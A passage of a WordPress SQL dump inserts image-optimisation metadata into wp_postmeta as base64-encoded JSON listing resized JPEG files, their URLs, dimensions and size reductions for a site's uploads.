Y3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTIwMjAsInRpbWUiOjE0ODM1NTI2NjIsImlkIjoxODkyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjU5LCJ0aW1lIjoxNDgzNTUyNjY1LCJpZCI6MTg5Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjU0NiwidGltZSI6MTQ4MzU1MjY2OSwiaWQiOjE4OTJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBJS1VSRS0zMjIzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo2MDMsInRpbWUiOjE0ODM1NTI2NzIsImlkIjoxODkyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQSUtVUkUtMzIyMy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MjAyOSwidGltZSI6MTQ4MzU1MjY3NSwiaWQiOjE4OTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjY5MywidGltZSI6MTQ4MzU1MjY3OSwiaWQiOjE4OTJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUElLVVJFLTMyMjMtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMDEsInRpbWUiOjE0ODM1NTI2ODIsImlkIjoxODkyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29048, 1891, 'wpfc_optimisation_reduction', '55870'); 
INSERT INTO `wp_postmeta` VALUES (29049, 1891, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi5qcGciLCJ3aWR0aCI6Mzk3MywiaGVpZ2h0IjoyMjM3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTIuanBnIiwicmVkdWN0aW9uIjo1NTg2MCwidGltZSI6MTQ4MzU1MjY5MSwiaWQiOiIxODkxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTI2OTMsImlkIjoxODkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTgwMHg0NTAuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo0NTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItODAweDQ1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi04MDB4NDUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MjY5NiwiaWQiOjE4OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItNzY4eDQzMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQzMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi03Njh4NDMyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTc2OHg0MzIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUyNjk5LCJpZCI6MTg5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi0xNjAweDkwMS5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0Ijo5MDEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItMTYwMHg5MDEuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItMTYwMHg5MDEuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUyNzAyLCJpZCI6MTg5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTI3MDUsImlkIjoxODkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MjcwNywiaWQiOjE4OTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUyNzEyLCJpZCI6MTg5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTI3MTQsImlkIjoxODkxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUyNzE3LCJpZCI6MTg5MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1NwZWNpYWx0eS1Qcm9kdWN0cy0yLTQ1MHgyNTMuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvU3BlY2lhbHR5LVByb2R1Y3RzLTItNDUweDI1My5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjI1MyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9TcGVjaWFsdHktUHJvZHVjdHMtMi00NTB4MjUzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MjcxOSwiaWQiOjE4OTF9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29050, 1890, 'wpfc_optimisation_reduction', '22262'); 
INSERT INTO `wp_postmeta` VALUES (29051, 1890, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyNS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyNzI0LCJpZCI6IjE4OTAifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyNS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6ODE3LCJ0aW1lIjoxNDgzNTUyNzI3LCJpZCI6MTg5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyNS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjUtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjI4OTMsInRpbWUiOjE0ODM1NTI3MzEsImlkIjoxODkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyNS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MjYwNywidGltZSI6MTQ4MzU1MjczNCwiaWQiOjE4OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI1LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjExMTQxLCJ0aW1lIjoxNDgzNTUyNzM4LCJpZCI6MTg5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyNS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI1LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU0OSwidGltZSI6MTQ4MzU1Mjc0MSwiaWQiOjE4OTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyNS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tODI1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzksInRpbWUiOjE0ODM1NTI3NDUsImlkIjoxODkwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTgyNS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTMxLCJ0aW1lIjoxNDgzNTUyNzQ4LCJpZCI6MTg5MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTgyNS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODI1LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi04MjUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE3NDYsInRpbWUiOjE0ODM1NTI3NTIsImlkIjoxODkwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04MjUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3R